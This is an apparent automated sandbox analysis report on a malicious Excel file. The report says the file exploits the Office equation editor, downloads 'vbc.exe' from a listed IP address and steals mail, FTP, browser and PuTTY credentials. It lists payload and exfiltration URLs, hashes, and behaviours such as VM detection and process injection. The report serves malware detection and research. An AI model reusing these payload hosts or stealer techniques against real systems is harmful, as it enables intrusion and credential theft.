                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items21
                    Software Packing
                    DCSync114
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    Extra Window Memory Injection
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 562302 Sample: 2nd order.xlsx Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 14 other signatures 2->40 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 33 25 2->12         started        process3 dnsIp4 24 198.12.127.213, 49167, 80 AS-COLOCROSSINGUS United States 7->24 20 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->20 dropped 22 C:\Users\Public\vbc.exe, PE32 7->22 dropped 42 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->42 14 vbc.exe 1 5 7->14         started        file5 signatures6 process7 signatures8 44 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->44 46 Machine Learning detection for dropped file 14->46 48 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->48 50 Injects a PE file into a foreign processes 14->50 17 vbc.exe 12 2 14->17         started        process9 signatures10 26 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->26 28 Tries to steal Mail credentials (via file / registry access) 17->28 30 Tries to harvest and steal ftp login credentials 17->30 32 Tries to harvest and steal browser information (history, passwords, etc) 17->32

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    C:\Users\Public\vbc.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLinkDownload
                    5.0.vbc.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                    5.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                    5.0.vbc.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                    5.0.vbc.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File
                    5.0.vbc.exe.400000.13.unpack100%AviraTR/Spy.Gen8Download File
                    5.0.vbc.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://blog.iandreev.com0%Avira URL Cloudsafe
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://SsT3DRxYDVjmHt.org0%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://blog.iandreev.com/0%Avira URL Cloudsafe
                    ftp://primesinsured.com/oil1100%Avira URL Cloudmalware
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    http://198.12.127.213/400/vbc.exe0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    http://FujuYs.com0%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://198.12.127.213/400/vbc.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://blog.iandreev.comvbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://127.0.0.1:HTTP/1.1vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://SsT3DRxYDVjmHt.orgvbc.exe, 00000005.00000002.669295106.0000000002371000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://DynDns.comDynDNSvbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://blog.iandreev.com/vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    ftp://primesinsured.com/oil1vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000005.00000002.669330015.00000000023B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://FujuYs.comvbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      198.12.127.213
                      unknownUnited States
                      36352AS-COLOCROSSINGUStrue
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:562302
                      Start date:28.01.2022
                      Start time:18:39:31
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 47s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:2nd order.xlsx
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:7
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/18@0/1
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 4.8% (good quality ratio 3.7%)
                      • Quality average: 53.9%
                      • Quality standard deviation: 37.7%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .xlsx
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                      • TCP Packets have been reduced to 100
                      • Execution Graph export aborted for target vbc.exe, PID 2408 because it is empty
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      18:40:38API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
                      18:40:42API Interceptor862x Sleep call for process: vbc.exe modified
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:downloaded
                      Size (bytes):860672
                      Entropy (8bit):6.572883902569515
                      Encrypted:false
                      SSDEEP:12288:v56/UhZo9xs63fvQAfo8y5gypOqw//wEkbpyXrf5r+2SF:v56/U/oF3RjSRQspy7fdgF
                      MD5:345EBABC50767D04F3457FA7790A8777
                      SHA1:F822FA282003B1A3F9301156AA5639A6928B93FD
                      SHA-256:2CA98A5A8B6BDD9EAC1FDF5C05E42792883DEA0AE402A6148BC6F04204CC6B72
                      SHA-512:8894559509EBD53A56A4649C25CB2380DA6717C9171F7CB86B2DF138463A4CF6979F27A81DFBA6114621F169DBCA17EE6E4FF44B6C4C4BAFE2A74BAD4E402B31
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Reputation:low
                      IE Cache URL:http://198.12.127.213/400/vbc.exe
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.............................2... ...@....@.. ....................................@.................................P2..K....`...............................1............................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc........`......................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):5396
                      Entropy (8bit):7.915293088075047
                      Encrypted:false
                      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                      Category:dropped
                      Size (bytes):1099960
                      Entropy (8bit):2.015280367426475
                      Encrypted:false
                      SSDEEP:3072:NXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:bahIFdyiaT2qtXl
                      MD5:DBCEC065CCFD33FB6FBDB3D963DD031E
                      SHA1:C1F738028E0D3E80B1450FFEA22A089E826100B1
                      SHA-256:F2F2541B5F3B58DED47990CCD051D44CD9B509303E034CBA58545132128397FE
                      SHA-512:3FC2982AFC516AB444DC23E6DAD7DE82FAB16007AC7C369BE053906DA3832DDDF07F5F37D5C11011B1DA0F951AD965404C66A50785CC92A34AD915C0CF62E005
                      Malicious:false
                      Reputation:low
                      Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................>V$...8.s..fHV.@(.%.....s.X.s.......s.<.s.RQ.W..s...s.....$.s...s.$Q.W..s...s. ...IdHV..s...s. .........z..dHV........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........H.s.X.....s...s..8@V......z.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                      Category:dropped
                      Size (bytes):4396
                      Entropy (8bit):7.884233298494423
                      Encrypted:false
                      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):10202
                      Entropy (8bit):7.870143202588524
                      Encrypted:false
                      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                      MD5:66EF10508ED9AE9871D59F267FBE15AA
                      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):2647
                      Entropy (8bit):7.8900124483490135
                      Encrypted:false
                      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                      MD5:E46357D82EBC866EEBDA98FA8F94B385
                      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                      Malicious:false
                      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                      Category:dropped
                      Size (bytes):4396
                      Entropy (8bit):7.884233298494423
                      Encrypted:false
                      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                      Malicious:false
                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):2647
                      Entropy (8bit):7.8900124483490135
                      Encrypted:false
                      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                      MD5:E46357D82EBC866EEBDA98FA8F94B385
                      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                      Malicious:false
                      Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):5396
                      Entropy (8bit):7.915293088075047
                      Encrypted:false
                      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                      Malicious:false
                      Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):10202
                      Entropy (8bit):7.870143202588524
                      Encrypted:false
                      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                      MD5:66EF10508ED9AE9871D59F267FBE15AA
                      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                      Malicious:false
                      Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                      Category:dropped
                      Size (bytes):11303
                      Entropy (8bit):7.909402464702408
                      Encrypted:false
                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                      Malicious:false
